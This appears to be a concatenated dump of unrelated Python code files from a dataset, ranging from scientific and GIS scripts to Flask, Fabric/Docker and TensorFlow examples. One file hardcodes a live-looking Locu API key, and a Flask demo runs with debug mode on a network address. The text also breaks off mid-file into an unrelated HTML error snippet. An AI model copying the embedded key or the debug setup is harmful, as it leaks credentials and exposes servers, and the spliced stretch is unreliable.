def work_DS2QDB_operate(self):\n \"\"\" 慢速定时器组回调函数 : 更新行情数据库 \"\"\"\n # 全球市场结算时间不更新数据库\n if Constant.is_closing_market():\n return\n if Constant.exit_on_weekend(self.week):\n sys.exit()\n\n self.dbQuotationHdl.update_period_db()\n","sub_path":"core/CoordinateDS2QDB.py","file_name":"CoordinateDS2QDB.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"501790554","text":"import requests,sys,html,datetime,os,re,time,json,pywinauto,configparser,logging,threading,zipfile,shutil\r\nimport pyodbc \r\nfrom bs4 import BeautifulSoup\r\nfrom time import sleep\r\nfrom pywinauto.findwindows import find_window\r\nfrom pywinauto.application import Application\r\nfrom pywinauto.win32functions import SetForegroundWindow\r\nfrom pywinauto.win32functions import ShowWindow\r\nfrom dateutil.relativedelta import relativedelta\r\nfrom collections import OrderedDict\r\nfrom requests.auth import HTTPProxyAuth\r\n\r\n\r\n# Function to create, if not exists, a directory\r\ndef create_dir(file_path):\r\n directory = os.path.dirname(file_path)\r\n if not os.path.exists(directory):\r\n try:\r\n os.makedirs(directory)\r\n except:\r\n pass\r\n\r\n# Get all inputs on a
Internal Server Error
\\n \\n ' \\\n '\\n\\n\\n'\n\n sock.sendall(head + body)\n sock.close()\n\ndef test_internal_server_error():\n with server(internal_server_error):\n client = HTTPClient(*listener)\n response = client.get('/')\n assert not response.should_keep_alive()\n assert response.should_close()\n body = response.read()\n assert len(body) == response.content_length\n\n\n","sub_path":"src/geventhttpclient/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"555819562","text":"from flask import Flask, jsonify, request\n\n# 创建服务\napp = Flask(__name__)\n\n\n# 指定接口的访问路径,和支持什么请求方式get,post\n@app.route('/hello', methods=['get', 'post'])\ndef hello():\n people = request.args.get('people')\n return f\"hello:\\t{people}\"\n\n\n@app.route('/hi', methods=['get'])\ndef hi():\n people = request.args.get('people')\n age = request.args.get('age')\n data = {}\n data['age'] = age\n data['hi'] = people\n return jsonify(data)\n\n\nif __name__ == '__main__':\n # host:指定绑定IP,port:指定绑定端口,debug指定:是否接受调试,是否返回错误信息\n app.run(host='192.168.1.104', port=8802, debug=True)\n","sub_path":"test/worm_api.py","file_name":"worm_api.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"213745640","text":"import cv2\nimport os\nimport numpy as np\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nimage_dir = os.path.join(BASE_DIR, \"cropped\")\n\ndirs = [\"cropped\", \"spam_data3\"]#, \"spam_data2\"]\n\nface_cascade = cv2.CascadeClassifier('cascades/haarcascade_frontalface_alt2.xml')\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\n#recognizer.setNeighbors(10)\n#recognizer.setRadius(2)\n#recognizer.setGridX(10)\n#recognizer.setGridY(10)\n\ncount = 0\ny_labels = []\nx_train = []\n\nfor dir in dirs:\n image_dir = os.path.join(BASE_DIR, dir)\n for root, dirs, files in os.walk(image_dir):\n for file in files:\n if file.endswith(\"png\") or file.endswith(\"jpg\") or file.endswith(\"jpeg\"):\n path = os.path.join(root, file)\n #label = os.path.basename(root).replace(\" \", \"-\").lower()\n # print(label, path)\n #if not label in label_ids:\n # label_ids[label] = current_id\n # current_id += 1\n #id_ = label_ids[label]\n # print(label_ids)\n # x_train.append(path) # verify this image, turn into a NUMPY arrray, GRAY\n pil_image = cv2.imread(path, cv2.IMREAD_GRAYSCALE) # grayscale\n\n size = (550, 550)\n final_image = cv2.resize(pil_image,size)\n #cv2.imshow(file, final_image)\n #print(image_array)\n faces = face_cascade.detectMultiScale(pil_image, scaleFactor=1.09)\n\n for (x, y, w, h) in faces:\n roi = pil_image[y:y + h, x:x + w]\n x_train.append(roi)\n y_labels.append(0) # some number\n else:\n x_train.append(pil_image)\n y_labels.append(0) # some number\n count += 1\n\n# print(y_labels)\n# print(x_train)\n\n#with open(\"pickles/face-labels.pickle\", 'wb') as f:\n# pickle.dump(label_ids, f)\n\noutput_file = os.path.join(BASE_DIR, \"recognizers/face-trainner.yml\")\n\nrecognizer.train(x_train, np.array(y_labels))\nrecognizer.save('face-trainner_nohair_nosize.yml')\n\nprint(\"trained \"+str(count))\n\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"Task 1/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"628983285","text":"import csv\nimport json\nimport urllib\n \ndef do_compute():\n # Grab your CUMTD key from ../static/keys/cumtd.txt\n # ...raise an error if the key file is empty\n f = open(\"../static/keys/cumtd.txt\")\n cumtd_key = f.read().strip()\n\n if len(cumtd_key) == 0:\n raise ValueError(\"No CUMTD API key provided in /static/keys/cumtd.txt\")\n \n\n # Prepare the API request\n url = \"https://developer.cumtd.com/api/v2.2/json/GetDeparturesByStop?\"\n \n urlArgs = {\n \"key\": cumtd_key,\n \"stop_id\": \"GRGDNR\"\n }\n\n\n # Make the API request and store the result JSON in `result` \n req = urllib.urlopen( url + urllib.urlencode(urlArgs) )\n result = json.load( req )\n \n \n # Parse result into a `schedule` dictionary to be used by JavaScript\n schedule = {}\n \n for d in result[\"departures\"]:\n expected_mins = d[\"expected_mins\"]\n headsign = d[\"headsign\"]\n color = d[\"route\"][\"route_color\"]\n text_color = d[\"route\"][\"route_text_color\"]\n \n if headsign not in schedule:\n schedule[headsign] = { \"color\": color,\n \"text_color\": text_color,\n \"headsign\": headsign,\n \"expected\": [] }\n \n schedule[headsign][\"expected\"].append(expected_mins)\n \n \n # Save our JSON\n # ...first the full `result` (for debugging)\n f = open(\"res/cumtd.json\", \"w\")\n s = json.dumps(result, indent = 4)\n f.write(s)\n \n # ...and also the `schedule` (for our JavaScript to use)\n f = open(\"res/schedule.json\", \"w\")\n s = json.dumps(schedule, indent = 4)\n f.write(s)\n\n return 1 \n","sub_path":"demo_gmaps+cumtd/py/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"634000497","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport time\n\ndef init_weights(shape):\n return tf.Variable(tf.random_normal(shape, stddev=1))\n\n# Sigmoid used. replace with tanh for hyperbolic tangent\ndef model(X, w_h1, w_o):\n h1 = tf.nn.tanh(tf.nn.sigmoid(tf.matmul(X, w_h1)))\n return tf.matmul(h1, w_o)\n\ndef answer(x,y):\n return np.cos(x + (6 * 0.35 * y)) + (2 * 0.35 * x * y)\n\n#training: 10, testing: 9\ndef data(n):\n uniformRange = np.linspace(-1,1,n)\n data = []\n for i in range(0,n):\n for j in range(0,n):\n data.append([uniformRange[i],uniformRange[j]])\n return data\ndef validationData(n):\n return np.random.rand(n**2,2) * 2 - 1\n\ndef runNeuralNetwork(h1Size, optimizerIndex, plotColour, plot, epochs, earlyStop):\n X = tf.placeholder(\"float\", [None, 2])\n Y = tf.placeholder(\"float\", [None, 1])\n\n size_h1 = tf.constant(h1Size, dtype=tf.int32)\n\n w_h1 = init_weights([2, size_h1])\n w_o = init_weights([size_h1, 1])\n py_x = model(X, w_h1, w_o)\n\n learningRate = 0.02\n tolerance = 0.02\n #cost = tf.sqrt(tf.reduce_sum(tf.square(tf.subtract(py_x, Y))))\n cost = tf.losses.mean_squared_error(py_x, Y)\n traingd = tf.train.GradientDescentOptimizer(learningRate).minimize(cost)\n traingdm = tf.train.MomentumOptimizer(learningRate,0.9).minimize(cost)\n traingrms = tf.train.RMSPropOptimizer(learning_rate=learningRate).minimize(cost)\n optimizers = [traingd, traingdm, traingrms]\n predict_op = py_x\n\n trX = data(10)\n trY = np.transpose(np.matrix(list(map(lambda x: answer(x[0], x[1]), trX))))\n trX = np.matrix(trX)\n teX = data(9)\n teY = np.transpose(np.matrix(list(map(lambda x: answer(x[0], x[1]), teX))))\n teX = np.matrix(teX)\n\n vX = np.matrix([])\n vY = np.matrix([])\n vError = 0\n #early stopping\n if (earlyStop):\n vX = validationData(10)\n vY = np.transpose(np.matrix(list(map(lambda x: answer(x[0], x[1]), vX))))\n vX = np.matrix(vX)\n vError = np.inf\n\n # Launch the graph in a session\n with tf.Session() as sess:\n # you need to initialize all variables\n tf.global_variables_initializer().run()\n vFail = 0\n for i in range(epochs):\n for start, end in zip(range(0, 90, 10), range(10, 100, 10)):\n sess.run(optimizers[optimizerIndex], feed_dict={X: trX[start:end], Y: trY[start:end]})\n if earlyStop:\n error = sess.run(tf.losses.mean_squared_error(vY, sess.run(predict_op, feed_dict={X: vX})))\n print(error)\n if (error >= vError):\n vFail += 1\n else:\n vError = error\n if (vFail >= 10):\n print(\"Validation early stopping\")\n break\n if i % (epochs/25) == 0:\n error = sess.run(tf.losses.mean_squared_error(trY, sess.run(predict_op, feed_dict={X: trX})))\n #print(error\n if (error < tolerance):\n print(\"converged below tolerance\")\n break\n print(i, sess.run(tf.losses.mean_squared_error(teY, sess.run(predict_op, feed_dict={X: teX}))))\n #done so do the contour\n if plot:\n contourInputs = np.matrix(data(10))\n Xval = contourInputs[:,0]\n Yval = contourInputs[:,1]\n Z = sess.run(predict_op, feed_dict={X: contourInputs}).reshape(10,10)\n Xval,Yval = np.meshgrid(np.linspace(-1,1,10),np.linspace(-1,1,10))\n Zans = np.cos(Xval + 6 * 0.35 * Yval) + 2 * 0.35 * np.multiply(Xval,Yval)\n plt.contour(Yval, Xval,Z,colors=plotColour)\n\n\n#X,Y = np.meshgrid(np.linspace(-1,1,100),np.linspace(-1,1,100))\n#Z = np.cos(X + 6 * 0.35 * Y) + 2 * 0.35 * np.multiply(X,Y)\n#plt.figure()\n#plt.contour(X,Y,Z, colors='black')\n\n#sizes = [2,8,50]\ncontourColours = ['red','blue','green']\n\n#part a\n#for i in range(0,3):\n# runNeuralNetwork(sizes[i], 0, contourColours[i], True, 50000, False)\n#plt.show()\n\n#part b\n#for i in range(0,3):\n# for j in range(0,3):\n# runNeuralNetwork(sizes[j],i, contourColours[j], False, 50000, False)\n# 0 = gd, 1 = momentum, 2 = rms\n#for i in range(0,3):\n# for j in range(0,3):\n# start = time.time()\n# runNeuralNetwork(sizes[j],i, contourColours[j], False, 100, False)\n# end = time.time()\n# elapsed = end - start\n# print(\"optimizer: \", i,\"\\nsize: \",sizes[j], \"\\ntime: \" ,elapsed)\n\n#part c\n# 200 epochs chosen since it takes very long to put more epochs for validation\n#for i in range(0,3):\n# runNeuralNetwork(sizes[i], 2, contourColours[i], False, 200, True)\n#rangeSizes = [1, 2, 3, 5, 7, 11, 13, 17, 19, 23, 31, 100, 1000]\n#for i in range(0,len(rangeSizes)):\n# print(rangeSizes[i])\n# runNeuralNetwork(rangeSizes[i], 2, contourColours[0], False, 5000, False)\n\n\nX,Y = np.meshgrid(np.linspace(-1,1,10),np.linspace(-1,1,10))\nZ = np.cos(X + 6 * 0.35 * Y) + 2 * 0.35 * np.multiply(X,Y)\nplt.figure()\nplt.contour(X,Y,Z, colors='black')\n\nrunNeuralNetwork(8, 2, contourColours[0], True, 5000, True)\nrunNeuralNetwork(8, 2, contourColours[1], True, 5000, False)\nplt.show()\n","sub_path":"q1c.py","file_name":"q1c.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"295692296","text":"#! /home/hda/anaconda3/bin/python\nimport sys\nimport time\n\ndef fibo(n,memo):\n if (n==0 or n==1):\n memo[n] = n\n return n\n else:\n if memo[n] != None: \n return memo[n]\n else:\n memo[n] = fibo(n-1,memo) + fibo(n-2,memo)\n return memo[n]\n\ndef main():\n n = int(sys.argv[1])\n t0 = time.time()\n memo = [None]*(n+1)\n f= fibo(n, memo)\n t1 = time.time()\n dt = t1 - t0\n print(f, dt)\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"fiboMemo.py","file_name":"fiboMemo.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"235432827","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nProjects metrics onto the endpoints of streamlines. The idea is to visualize\nthe cortical areas affected by metrics (assuming streamlines start/end in\nthe cortex).\n\"\"\"\n\nimport argparse\nimport logging\nimport os\n\nimport nibabel as nib\nfrom nibabel.streamlines import ArraySequence\nimport numpy as np\n\nfrom scilpy.io.image import assert_same_resolution\nfrom scilpy.io.streamlines import load_tractogram_with_reference\nfrom scilpy.io.utils import (add_overwrite_arg,\n assert_inputs_exist,\n assert_output_dirs_exist_and_empty,\n add_reference_arg)\nfrom scilpy.utils.filenames import split_name_with_nii\nfrom scilpy.tractanalysis.streamlines_metrics import \\\n compute_tract_counts_map\nfrom scilpy.tractanalysis.uncompress import uncompress\n\n\ndef _build_arg_parser():\n p = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n p.add_argument('in_bundle',\n help='Fiber bundle file.')\n p.add_argument('metrics',\n nargs='+',\n help='Nifti metric(s) to compute statistics on.')\n p.add_argument('output_folder',\n help='Folder where to save endpoints metric.')\n\n add_reference_arg(p)\n add_overwrite_arg(p)\n return p\n\n\ndef _compute_streamline_mean(cur_ind, cur_min, cur_max, data):\n # From the precomputed indices, compute the binary map\n # and use it to weight the metric data for this specific streamline.\n cur_range = tuple(cur_max - cur_min)\n streamline_density = compute_tract_counts_map(ArraySequence([cur_ind]),\n cur_range)\n streamline_data = data[cur_min[0]:cur_max[0],\n cur_min[1]:cur_max[1],\n cur_min[2]:cur_max[2]]\n streamline_average = np.average(streamline_data,\n weights=streamline_density)\n return streamline_average\n\n\ndef _process_streamlines(streamlines):\n # Compute the bounding boxes and indices for all streamlines.\n mins = []\n maxs = []\n offset_streamlines = []\n\n # Offset the streamlines to compute the indices only in the bounding box.\n # Reduces memory use later on.\n for idx, s in enumerate(streamlines):\n mins.append(np.min(s.astype(int), 0))\n maxs.append(np.max(s.astype(int), 0) + 1)\n offset_streamlines.append((s - mins[-1]).astype(np.float32))\n\n offset_streamlines = ArraySequence(offset_streamlines)\n indices = uncompress(offset_streamlines)\n\n return mins, maxs, indices\n\n\ndef main():\n parser = _build_arg_parser()\n args = parser.parse_args()\n\n assert_inputs_exist(parser, [args.in_bundle] + args.metrics)\n assert_output_dirs_exist_and_empty(parser, args,\n args.output_folder,\n create_dir=True)\n\n assert_same_resolution(args.metrics)\n\n sft = load_tractogram_with_reference(parser, args, args.in_bundle)\n sft.to_vox()\n sft.to_corner()\n\n if len(sft.streamlines) == 0:\n logging.warning('Empty bundle file {}. Skipping'.format(args.bundle))\n return\n\n mins, maxs, indices = _process_streamlines(sft.streamlines)\n\n metrics = [nib.load(metric) for metric in args.metrics]\n for metric in metrics:\n data = metric.get_data()\n endpoint_metric_map = np.zeros(metric.shape)\n count = np.zeros(metric.shape)\n for cur_min, cur_max, cur_ind, orig_s in zip(mins, maxs,\n indices,\n sft.streamlines):\n streamline_mean = _compute_streamline_mean(cur_ind,\n cur_min,\n cur_max,\n data)\n\n xyz = orig_s[0, :].astype(int)\n endpoint_metric_map[xyz[0], xyz[1], xyz[2]] += streamline_mean\n count[xyz[0], xyz[1], xyz[2]] += 1\n\n xyz = orig_s[-1, :].astype(int)\n endpoint_metric_map[xyz[0], xyz[1], xyz[2]] += streamline_mean\n count[xyz[0], xyz[1], xyz[2]] += 1\n\n endpoint_metric_map[count != 0] /= count[count != 0]\n metric_fname, ext = split_name_with_nii(\n os.path.basename(metric.get_filename()))\n nib.save(nib.Nifti1Image(endpoint_metric_map, metric.affine,\n metric.header),\n os.path.join(args.output_folder,\n '{}_endpoints_metric{}'.format(metric_fname,\n ext)))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/scil_endpoints_metric.py","file_name":"scil_endpoints_metric.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"547576009","text":"import urllib2\nimport json\n\n\napi = '4850b2b194bae5d077e048d768aebb840a9c07f4'\n\nurl = 'https://api.locu.com/v1_0/venue/search/?'\n\n\nlocal = 'Newport Beach'\nlocality = local.replace(' ', '%20')\n\n\nnew_url = url + 'api_key=' + api + '&locality=' + locality\n\n\nobj = urllib2.urlopen(new_url)\ndata = json.load(obj)","sub_path":"src/profiles/locu.py","file_name":"locu.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"233213480","text":"\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport time\nfrom fabric.api import * # run,cd,env,hosts,execute,sudo,settings,hide\nfrom fabric.colors import *\nfrom fabric.contrib.console import confirm\nimport config\nimport json\nfrom fabric.tasks import Task\n\n\nclass HA():\n def __init__(self):\n self.host = \"root@{host}:{port}\"\n self.ssh = \"root@{host}:{port}\"\n self.env = env\n self.env.warn_only = True # 这样写比较痛快\n self.env.hosts = [\n self.host.format(host=host[0],port=host[2]) for host in config.conf_list]\n self.env.passwords = {\n self.ssh.format(host=host[0], port=host[2]):host[1] for host in config.conf_list}\n\n # self.env.roledefs = {\n # 'web': [self.env[\"hosts\"][0]], # role名称为:web\n # 'db': [self.env[\"hosts\"][1] ] # role名称为:db\n # }\n\n print(self.env[\"hosts\"])\n\n \n \n @task\n def get_docker_v(): # 查看docker版本\n with cd('../home'):\n run('docker version')\n\n @task\n def pull_images(images_name):\n with settings(warn_only=True):\n with cd(\"../home/\"):\n try:\n run(\"docker pull {}\".format(images_name))\n except:\n abort(\"docker pull failed\")\n\n @task\n def push_images(images_name,username_repository,tag):\n with settings(warn_only=True):\n with cd(\"../home/\"):\n try:\n run(\"docker tag {image_name} {username_repository}:{tag}\".format(images_name=images_name,username_repository=username_repository,tag=tag))\n run(\"docker push {username_repository}:{tag}\".format(username_repository=username_repository,tag=tag))\n except:\n abort(\"docker push failed\")\n\n @task\n def run_docker_images(images_name_tag):\n with settings(warn_only=True):\n with cd(\"../home/\"):\n try:\n run(\"docker run -p 4000:80 {}\".format(images_name_tag))\n except:\n abort(\"docker run failed\")\n\n\n @task\n @parallel\n def execute_docker_compose():\n with settings(warn_only=True):\n with cd(\"../home/flask_app\"):\n run(\"docker-compose up\")\n\n\n @task\n def create_docker_service(service_name,images_name,num=4):\n with settings(warn_only=True):\n with cd(\"../home/\"):\n run(\"docker service create --name {service_name} -p 4000:80 {images_name}\".format(service_name=service_name,images_name=images_name))\n run(\"docker service scale {service_name}={num}\".format(service_name=service_name,num=num))\n \n \n @task\n def stop_docker_service(service_name):\n with settings(warn_only=True):\n with cd(\"../home/\"):\n run(\"docker service rm {}\".format(service_name))\n\n def Run(self):\n # execute(self.create_docker_service,\"demo\",\"3417947630/py:hello\")\n execute(self.execute_docker_compose)\n\nh = HA()\nh.Run()\n","sub_path":"fab_docker/docker_ssh.py","file_name":"docker_ssh.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"474376416","text":"from __future__ import print_function\nimport os\nfrom catkin.workspace import get_source_paths, get_workspaces\nfrom catkin_pkg.packages import find_packages\n\n\ndef _get_valid_search_dirs(search_dirs, project):\n \"\"\"\n compares param collection of search dirs with valid names, raises ValueError if invalid.\n maintains the order of param if any. If project is given other names are allowed than without.\n\n :param search_dirs: collection of foldernames (basename) to search for\n :param project: the project to search in or None\n :raises: ValueError\n \"\"\"\n # define valid search folders\n valid_global_search_dirs = ['bin', 'etc', 'include', 'lib', 'share']\n valid_project_search_dirs = ['etc', 'include', 'libexec', 'share']\n\n valid_search_dirs = (valid_global_search_dirs\n if project is None\n else valid_project_search_dirs)\n if not search_dirs:\n search_dirs = valid_search_dirs\n else:\n # make search folders a list\n search_dirs = list(search_dirs)\n\n # determine valid search folders\n all_valid_search_dirs = set(valid_global_search_dirs).union(\n set(valid_project_search_dirs))\n\n # check folder name is known at all\n diff_dirs = set(search_dirs).difference(all_valid_search_dirs)\n if len(diff_dirs) > 0:\n raise ValueError('Unsupported search folders: ' +\n ', '.join(['\"%s\"' % i for i in diff_dirs]))\n # check foldername works with project arg\n diff_dirs = set(search_dirs).difference(valid_search_dirs)\n if len(diff_dirs) > 0:\n msg = 'Searching %s a project can not be combined with the search folders:' % ('without' if project is None else 'for')\n raise ValueError(msg + ', '.join(['\"%s\"' % i for i in diff_dirs]))\n return search_dirs\n\n\n# OUT is always a list of folders\n#\n# IN: project=None\n# OUT: foreach ws in workspaces: foreach s in search_in: cand = ws[0] + s (+ path)\n# add cand to result list if it exists\n# is not defined for s == 'libexec', bailing out\n#\n# IN: project=not None\n# OUT: foreach ws in workspaces: foreach s in search_in: cand = ws[0] + s + project (+ path)\n# except for s == 'share', cand is a list of two paths: ws[0] + s + project (+ path) and ws[1] + project (+ path)\n# add cand to result list if it exists\n# is not defined for s in ['bin', 'lib'], bailing out\ndef find_in_workspaces(search_dirs=None, project=None, path=None, _workspaces=get_workspaces(), considered_paths=None, first_matching_workspace_only=False, first_match_only=False):\n '''\n Find all paths which match the search criteria.\n All workspaces are searched in order.\n Each workspace, each search_in subfolder, the project name and the path are concatenated to define a candidate path.\n If the candidate path exists it is appended to the result list.\n Note: the search might return multiple paths for 'share' from build- and source-space.\n\n :param search_dir: The list of subfolders to search in (default contains all valid values: 'bin', 'etc', 'lib', 'libexec', 'share'), ``list``\n :param project: The project name to search for (optional, not possible with the global search_in folders 'bin' and 'lib'), ``str``\n :param path: The path, ``str``\n :param _workspaces: (optional, used for unit tests), the list of workspaces to use.\n :param considered_paths: If not None, function will append all path that were searched\n :param first_matching_workspace_only: if True returns all results found for first workspace with results\n :param first_match_only: if True returns first path found (supercedes first_matching_workspace_only)\n :raises ValueError: if search_dirs contains an invalid folder name\n :returns: List of paths\n '''\n search_dirs = _get_valid_search_dirs(search_dirs, project)\n\n paths = []\n existing_paths = []\n try:\n for workspace in (_workspaces or []):\n for sub in search_dirs:\n # search in workspace\n p = os.path.join(workspace, sub if sub != 'libexec' else 'lib')\n if project:\n p = os.path.join(p, project)\n if path:\n p = os.path.join(p, path)\n paths.append(p)\n if os.path.exists(p):\n existing_paths.append(p)\n if first_match_only:\n raise StopIteration\n\n # for search in share also consider source spaces\n if project is not None and sub == 'share':\n source_paths = get_source_paths(workspace)\n for source_path in source_paths:\n packages = find_packages(source_path)\n matching_packages = [p for p, pkg in packages.iteritems() if pkg.name == project]\n if matching_packages:\n p = os.path.join(source_path, matching_packages[0])\n if path is not None:\n p = os.path.join(p, path)\n paths.append(p)\n if os.path.exists(p):\n existing_paths.append(p)\n if first_match_only:\n raise StopIteration\n\n if first_matching_workspace_only and existing_paths:\n break\n\n except StopIteration:\n pass\n\n if considered_paths is not None:\n considered_paths.extend(paths)\n\n return existing_paths\n","sub_path":"root/ros_core_ws/build/catkin/lib.linux-armv7l-2.7/catkin/find_in_workspaces.py","file_name":"find_in_workspaces.py","file_ext":"py","file_size_in_byte":5622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"566019239","text":"\"\"\"asdf\"\"\"\n\nfrom arcpy import GetParameterAsText, ExcelToTable_conversion, AddMessage, da, AddFieldDelimiters, env, \\\n ListFeatureClasses, ListDatasets, ListFields, AddField_management, Delete_management\nfrom arcpy.da import SearchCursor, UpdateCursor\nimport sys\nimport os\nimport datetime\nfrom helper_functions.get_data_file import get_data_file\n\n# inDB = GetParameterAsText(0)\n# inHQIIS = GetParameterAsText(1)\n\ndef HQIIS_link(params):\n \"\"\"home\"\"\"\n global inDB\n global hqiis_dbf\n inDB = params[0].valueAsText\n hqiis_dbf = get_data_file(\"Data.gdb\\\\HQIIS\")\n #hqiis_dbf = os.path.split(__file__)[0] + r\"\\data\\HQIIS.dbf\"\n try:\n inside = insideFCWork()\n recordsUpdated = inside[0]\n recordsTotal = inside[1]\n AddMessage(\"Records updated: {0}\".format(recordsUpdated))\n AddMessage(\"Records in database: {0}\".format(recordsTotal))\n except Exception as e:\n AddMessage(e.message)\n\nclass Link(object):\n \"\"\"fills data from HQIIS to database\"\"\"\n\n def __init__(self, fc, hqiis):\n\n self.fc = fc\n self.fields = [f.name for f in ListFields(self.fc)]\n self.hqiis = hqiis\n self.recordsUpdated = 0\n self.reqFields = {\n # When adding a field it must be added to this list, and the rfield index's updated in inputData().\n # field: [name, type, length, alias, domain]\n 1: ['dateAcquired', 'DATE', None, 'DATEACQUIRED', None], # acquissition date\n # 2:['assetReviewDate', 'DATE', None, 'ASSETREVIEWDATE', None], ###not in HQIIS\n # 3:['material', 'TEXT', 15, 'MATERIAL', None], ###not in HQIIS\n # 4:['featureHeight', 'DOUBLE', None, 'FEATUREHEIGHT', None], ###not in HQIIS\n # 5:['featureHeightUOM', 'TEXT', 16, 'FEATUREHEIGHTUOM', 'GSIP_LengthUOM'], ###not in HQIIS\n 6: ['rpaQualityRate', 'LONG', None, 'RPAQUALITYRATE', None], # phys quality rate\n 7: ['numberOfLevels', 'TEXT', 120, 'NUMBEROFLEVELS', None], # floors above + floors below\n # 8:['primaryUOM', 'TEXT', 2, 'PRIMARYUOM', 'RPIM_UOM'], #do not take from HQIIS\n 9: ['typeCode', 'TEXT', 4, 'TYPECODE', 'RPATypeCode'], # interest type code\n 10: ['operationalStatus', 'TEXT', 17, 'OPERATIONALSTATUS', 'OperationalStatus'], # operational status code\n 11: ['placedInServiceDate', 'TEXT', 8, 'PLACEDINSERVICEDATE', None], # facility built date\n 12: ['predominantDesignUse', 'TEXT', 6, 'PREDOMINANTDESIGNUSE', 'RealPropertyFacilityCategoryCode'],\n # RPA PREDOMINANT DESIGN USE CATCODE\n 13: ['predominantDesignUseText', 'TEXT', 240, 'PREDOMINANTDESIGNUSETEXT', None],\n # RPA PREDOMINANT DESIGN USE CATCODE DESCRIPTION\n 14: ['interestType', 'TEXT', 2, 'INTERESTTYPE', None], # RPA TYPE CODE\n 15: ['facilityNumber', 'TEXT', 20, 'FACILITYNUMBER', None], # facility number\n 16: ['rpsuid', 'TEXT', None, 'RPSUID', None], # site uid\n 17: ['sdsFeatureName', 'TEXT', 80, 'SDSFEATURENAME', None], # rpa name\n 0: ['dateAcquired', 'rpaQualityRate', 'numberOfLevels', 'typeCode', 'operationalStatus',\n 'placedInServiceDate', 'predominantDesignUse', 'predominantDesignUseText', 'interestType',\n 'facilityNumber', 'rpsuid', 'sdsFeatureName'],\n 100: [\"rpuid\"]\n }\n\n def pullData(self, rpauid):\n rpa_field = AddFieldDelimiters(self.hqiis, \"RPA_UID\")\n with SearchCursor(self.hqiis, field_names=\"*\", where_clause=\"{0} = {1}\".format(rpa_field, str(rpauid))) \\\n as cursor:\n for r in cursor:\n x = []\n i = 0\n while i < 42:\n x.append(r[i])\n i += 1\n return x\n AddMessage(\"Ooops...a record has an unmatched RPA_UID in: \" + self.fc +\n \". The value is: \" + rpauid)\n x = []\n i = 0\n while i < 42:\n x.append(\"\")\n i += 1\n return x\n\n def IDPK(self):\n for field in self.fields:\n if field[-4:] == \"IDPK\":\n return [True, str(field)]\n else:\n continue\n if \"_\" in str(self.fc):\n index = 0\n for l in str(self.fc):\n if l == \"_\":\n field_name = str(self.fc)[:1].lower() + str(self.fc)[1:index] + \"IDPK\"\n break\n index += 1\n else:\n field_name = str(self.fc)[:1].lower() + str(self.fc)[1:] + \"IDPK\"\n # noinspection PyUnboundLocalVariable\n AddField_management(self.fc, field_name, \"TEXT\", field_length=20, field_alias=field_name.upper())\n return [True, field_name]\n\n def fix_duplicate_idpk(self):\n idpk_values = []\n with SearchCursor(self.fc, field_names=self.IDPK()[1]) as cursor:\n for r in cursor:\n idpk_values.append(r[0])\n rpsuids = []\n with SearchCursor(self.fc, field_names='rpsuid') as cursor:\n for row in cursor:\n rpsuids.append(row[0])\n idpk_delim = AddFieldDelimiters(self.fc, self.IDPK()[1])\n rpsuid_delim = AddFieldDelimiters(self.fc, 'rpsuid')\n for site in set(rpsuids):\n with UpdateCursor(self.fc, field_names=[self.IDPK()[1], \"rpsuid\"], where_clause=\"{0} is Null AND {1} = {2}\".format(idpk_delim, rpsuid_delim, site)) as cursor:\n index = 1\n try:\n for row in cursor:\n row[0] = str(row[1]) + \"_\" + str(index)\n index += 1\n cursor.updateRow(row)\n except Exception as e:\n AddMessage(\"No site uid's in {0}.\".format(self.fc))\n continue\n with UpdateCursor(self.fc, field_names=self.IDPK()[1], where_clause=\"{0} is Null\".format(idpk_delim)) as cursor:\n index = 1\n try:\n for row in cursor:\n row[0] = str(index)\n index += 1\n cursor.updateRow(row)\n except Exception as e:\n AddMessage(e.message)\n for idpk in set(idpk_values):\n if idpk_values.count(idpk) > 1:\n with UpdateCursor(self.fc, field_names=self.IDPK()[1], where_clause=\"{0} = '{1}'\".format(idpk_delim, str(idpk))) as cursor:\n index = 1\n for row in cursor:\n row[0] = row[0] + \"_\" + str(index)\n index += 1\n cursor.updateRow(row)\n\n def otherFields(self):\n present_fields = []\n self.pflds = ['rpuid', self.IDPK()[1]]\n self.ReqFields = []\n for rf in self.reqFields:\n if rf != 0 and rf != 100:\n if self.reqFields[rf][0] in self.fields:\n present_fields.append(True)\n self.pflds.append(self.reqFields[rf][0])\n else:\n present_fields.append(False)\n self.pflds.append(\"SHAPE@\")\n 